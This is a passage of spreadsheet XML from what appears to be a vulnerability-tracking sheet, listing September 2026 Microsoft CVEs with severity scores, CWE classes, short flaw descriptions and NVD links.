          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q745" s="5" t="inlineStr"/>
      <c r="R745" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S745" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69739</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69744</t>
        </is>
      </c>
      <c r="D746" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E746" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F746" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G746" s="5" t="inlineStr"/>
      <c r="H746" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I746" s="5" t="inlineStr"/>
      <c r="J746" s="5" t="inlineStr"/>
      <c r="K746" s="5" t="inlineStr"/>
      <c r="L746" s="5" t="inlineStr"/>
      <c r="M746" s="5" t="inlineStr"/>
      <c r="N746" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O746" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P746" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q746" s="5" t="inlineStr"/>
      <c r="R746" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S746" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69744</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69760</t>
        </is>
      </c>
      <c r="D747" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E747" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F747" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G747" s="5" t="inlineStr"/>
      <c r="H747" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I747" s="5" t="inlineStr"/>
      <c r="J747" s="5" t="inlineStr"/>
      <c r="K747" s="5" t="inlineStr"/>
      <c r="L747" s="5" t="inlineStr"/>
      <c r="M747" s="5" t="inlineStr"/>
      <c r="N747" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O747" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P747" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q747" s="5" t="inlineStr"/>
      <c r="R747" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S747" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69760</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69793</t>
        </is>
      </c>
      <c r="D748" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E748" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F748" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G748" s="5" t="inlineStr"/>
      <c r="H748" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I748" s="5" t="inlineStr"/>
      <c r="J748" s="5" t="inlineStr"/>
      <c r="K748" s="5" t="inlineStr"/>
      <c r="L748" s="5" t="inlineStr"/>
      <c r="M748" s="5" t="inlineStr"/>
      <c r="N748" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O748" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P748" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q748" s="5" t="inlineStr"/>
      <c r="R748" s="5" t="inlineStr">
        <is>
          <t>CWE-1288</t>
        </is>
      </c>
      <c r="S748" s="5" t="inlineStr">
        <is>
          <t>Improper validation of consistency within input in Windows TCP/IP allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69793</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69803</t>
        </is>
      </c>
      <c r="D749" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E749" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G749" s="5" t="inlineStr"/>
      <c r="H749" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I749" s="5" t="inlineStr"/>
      <c r="J749" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K749" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L749" s="5" t="inlineStr"/>
      <c r="M749" s="5" t="inlineStr"/>
      <c r="N749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O749" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P749" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q749" s="5" t="inlineStr"/>
      <c r="R749" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S749" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69803</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69804</t>
        </is>
      </c>
      <c r="D750" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E750" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F750" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G750" s="5" t="inlineStr"/>
      <c r="H750" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I750" s="5" t="inlineStr"/>
      <c r="J750" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K750" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L750" s="5" t="inlineStr"/>
      <c r="M750" s="5" t="inlineStr"/>
      <c r="N750" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O750" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P750" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q750" s="5" t="inlineStr"/>
      <c r="R750" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S750" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69804</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69805</t>
        </is>
      </c>
      <c r="D751" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E751" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F751" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G751" s="5" t="inlineStr"/>
      <c r="H751" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I751" s="5" t="inlineStr"/>
      <c r="J751" s="5" t="inlineStr"/>
      <c r="K751" s="5" t="inlineStr"/>
      <c r="L751" s="5" t="inlineStr"/>
      <c r="M751" s="5" t="inlineStr"/>
      <c r="N751" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O751" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P751" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q751" s="5" t="inlineStr"/>
      <c r="R751" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522, CWE-73</t>
        </is>
      </c>
      <c r="S751" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in .NET allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69805</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69809</t>
        </is>
      </c>
      <c r="D752" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E752" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F752" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G752" s="5" t="inlineStr"/>
      <c r="H752" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I752" s="5" t="inlineStr"/>
      <c r="J752" s="5" t="inlineStr"/>
      <c r="K752" s="5" t="inlineStr"/>
      <c r="L752" s="5" t="inlineStr"/>
      <c r="M752" s="5" t="inlineStr"/>
      <c r="N752" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O752" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P752" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q752" s="5" t="inlineStr"/>
      <c r="R752" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S752" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Active Directory Domain Services allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69809</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69852</t>
        </is>
      </c>
      <c r="D753" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E753" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F753" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G753" s="5" t="inlineStr"/>
      <c r="H753" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I753" s="5" t="inlineStr"/>
      <c r="J753" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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53" s="5" t="inlineStr"/>
      <c r="M753" s="5" t="inlineStr"/>
      <c r="N753" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O753" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P753" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q753" s="5" t="inlineStr"/>
      <c r="R753" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S753" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="T753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69881</t>
        </is>
      </c>
      <c r="D754" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E754" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F754" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G754" s="5" t="inlineStr"/>
      <c r="H754" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I754" s="5" t="inlineStr"/>
      <c r="J754" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K75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54" s="5" t="inlineStr"/>
      <c r="M754" s="5" t="inlineStr"/>
      <c r="N754" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O754" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P754" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q754" s="5" t="inlineStr"/>
      <c r="R754" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S754" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69890</t>
        </is>
      </c>
      <c r="D755" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E755" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F755" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G755" s="5" t="inlineStr"/>
      <c r="H755" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I755" s="5" t="inlineStr"/>
      <c r="J755" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K75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55" s="5" t="inlineStr"/>
      <c r="M755" s="5" t="inlineStr"/>
      <c r="N755" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O755" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P755" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q755" s="5" t="inlineStr"/>
      <c r="R755" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S755" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69929</t>
        </is>
      </c>
      <c r="D756" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E756" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G756" s="5" t="inlineStr"/>
      <c r="H756" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I756" s="5" t="inlineStr"/>
      <c r="J756" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K756" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L756" s="5" t="inlineStr"/>
      <c r="M756" s="5" t="inlineStr"/>
      <c r="N756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O756" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P756" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q756" s="5" t="inlineStr"/>
      <c r="R756" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S756" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69929</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69930</t>
        </is>
      </c>
      <c r="D757" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E757" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G757" s="5" t="inlineStr"/>
      <c r="H757" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I757" s="5" t="inlineStr"/>
      <c r="J757" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K757" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L757" s="5" t="inlineStr"/>
      <c r="M757" s="5" t="inlineStr"/>
      <c r="N757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O757" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P757" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q757" s="5" t="inlineStr"/>
      <c r="R757" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S757" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69930</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70065</t>
        </is>
      </c>
      <c r="D758" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E758" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F758" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G758" s="5" t="inlineStr"/>
      <c r="H758" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I758" s="5" t="inlineStr"/>
      <c r="J758" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K758" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L758" s="5" t="inlineStr"/>
      <c r="M758" s="5" t="inlineStr"/>
      <c r="N758" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O758" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P758" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q758" s="5" t="inlineStr"/>
      <c r="R758" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S758" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70065</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70124</t>
        </is>
      </c>
      <c r="D759" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E759" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F759" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G759" s="5" t="inlineStr"/>
      <c r="H759" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I759" s="5" t="inlineStr"/>
      <c r="J759" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K759" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L759" s="5" t="inlineStr"/>
      <c r="M759" s="5" t="inlineStr"/>
      <c r="N759" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O759" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P759" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q759" s="5" t="inlineStr"/>
      <c r="R759" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S759" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70124</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70570</t>
        </is>
      </c>
      <c r="D760" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E760" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F760" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G760" s="5" t="inlineStr"/>
      <c r="H760" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I760" s="5" t="inlineStr"/>
      <c r="J760" s="5" t="inlineStr"/>
      <c r="K760" s="5" t="inlineStr"/>
      <c r="L760" s="5" t="inlineStr"/>
      <c r="M760" s="5" t="inlineStr"/>
      <c r="N760" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O760" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P760" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q760" s="5" t="inlineStr"/>
      <c r="R760" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S760" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="T760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70570</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70579</t>
        </is>
      </c>
      <c r="D761" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E761" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F761" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G761" s="5" t="inlineStr"/>
      <c r="H761" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I761" s="5" t="inlineStr"/>
      <c r="J761" s="5" t="inlineStr"/>
      <c r="K761" s="5" t="inlineStr"/>
      <c r="L761" s="5" t="inlineStr"/>
      <c r="M761" s="5" t="inlineStr"/>
      <c r="N761" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O761" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P761" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q761" s="5" t="inlineStr"/>
      <c r="R761" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S761" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Mobile Broadband allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70579</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70587</t>
        </is>
      </c>
      <c r="D762" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E762" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F762" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G762" s="5" t="inlineStr"/>
      <c r="H762" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I762" s="5" t="inlineStr"/>
      <c r="J762" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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62" s="5" t="inlineStr"/>
      <c r="M762" s="5" t="inlineStr"/>
      <c r="N762" s="5" t="inlineStr">
